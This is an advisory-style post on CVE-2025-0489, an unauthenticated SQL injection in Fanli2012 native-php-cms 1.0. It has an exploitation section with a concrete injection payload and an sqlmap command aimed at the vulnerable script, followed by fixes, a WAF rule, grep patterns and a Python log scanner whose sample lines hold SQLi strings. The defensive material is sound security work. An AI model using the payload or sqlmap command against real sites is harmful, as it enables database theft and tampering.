Fanli2012 native-php-cms 1.0, SQL Injection, CVE-2025-0489 (Critical)

The CVE-2025-0489 vulnerability in Fanli2012 native-php-cms 1.0 allows remote attackers to execute arbitrary SQL queries via the `id` parameter in /fladmin/friendlink_dodel.php. This occurs due to insufficient input sanitization, enabling attackers to manipulate database queries. The flaw is exploitable without authentication, making it critical. Attackers can extract, modify, or delete database content, potentially compromising admin credentials or injecting malicious payloads. The CVSS 4.0 score reflects its high risk due to network-based exploitation, low attack complexity, and impacts on confidentiality, integrity, and availability.

DailyCVE Form

Platform: Fanli2012 native-php-cms
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/05/2025

What Undercode Says:

Exploitation:

1. Craft a malicious `id` payload:

GET /fladmin/friendlink_dodel.php?id=1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))--

2. Use SQLmap for automation:

sqlmap -u "http://target/fladmin/friendlink_dodel.php?id=1" --risk=3 --level=5

Mitigation:

1. Patch by sanitizing inputs:

// Escaping only neutralises quote characters; because `id` is numeric and typically interpolated unquoted,
// also cast to int so that nothing but digits can reach the query
$id = (int) mysqli_real_escape_string($conn, $_GET['id']);

2. Implement prepared statements:

$id = (int) ($_GET['id'] ?? 0);
$stmt = $conn->prepare("DELETE FROM friendlink WHERE id = ?");
$stmt->bind_param("i", $id);   // "i" binds the value as an integer; it can never change the query structure
$stmt->execute();

3. WAF rules to block SQLi patterns:

location ~ \.php$ {
    modsecurity on;
    modsecurity_rules 'SecRule ARGS "@detectSQLi" "id:1000,deny,status:403"';
}

Detection:

1. Log monitoring for suspicious queries:

grep -Ei "union.select|1=1" /var/log/apache2/access.log

2. Audit database permissions:

SELECT user, host FROM mysql.user WHERE Super_priv = 'Y';
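The grep above only catches payloads that appear verbatim in the access log; URL-encoded or double-encoded requests slip past it. The following script is an added example (not part of the advisory or the CMS), it decodes the query string of each request to the affected script and flags any `id` value that is not a plain integer, which is what the parameter is expected to be. The log lines are constructed samples in Apache combined format.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Apache "combined" log format: client, identd, user, [time], "request", status, bytes, "referer", "agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

# The script and parameter named in the advisory; `id` is a numeric row id in the friendlink table
VULN_SCRIPT = "/fladmin/friendlink_dodel.php"
INT_RE = re.compile(r"^\d+$")
# Common SQLi markers, used only to label the reason; any non-integer id is flagged regardless
SQLI_RE = re.compile(r"(union\s+select|information_schema|\bor\b\s+\d+=\d+|'\s*(and|or)\b|--|/\*|sleep\s*\()", re.I)

def flag_request(line):
    """Return a dict describing why a log line is suspicious, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != VULN_SCRIPT:
        return None
    # parse_qs percent-decodes once; decode a second time to expose double-encoded payloads
    for raw in parse_qs(parts.query, keep_blank_values=True).get("id", []):
        value = unquote_plus(raw)
        if INT_RE.match(value):
            continue
        reason = "sqli-pattern" if SQLI_RE.search(value) else "non-integer-id"
        return {"ip": m.group("ip"), "time": m.group("time"), "id": value, "reason": reason}
    return None

def scan(lines):
    """Run flag_request over an iterable of log lines and return the hits in order."""
    return [hit for hit in (flag_request(l) for l in lines) if hit]

# Constructed sample log lines (not taken from any real deployment)
SAMPLE_LOG = [
    '203.0.113.5 - - [05/May/2025:10:00:01 +0000] "GET /fladmin/friendlink_dodel.php?id=12 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [05/May/2025:10:00:07 +0000] "GET /fladmin/friendlink_dodel.php?id=1%27%20OR%201%3D1-- HTTP/1.1" 200 512 "-" "sqlmap/1.8"',
    '203.0.113.9 - - [05/May/2025:10:00:09 +0000] "GET /fladmin/friendlink_dodel.php?id=1%2520UNION%2520SELECT%25201 HTTP/1.1" 200 512 "-" "curl/8.0"',
    '198.51.100.2 - - [05/May/2025:10:00:11 +0000] "GET /index.php?id=1%27 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The third sample line is double-encoded, so neither `union.select` nor `1=1` appears in the raw log and the grep misses it, while the decoded check flags it.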

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
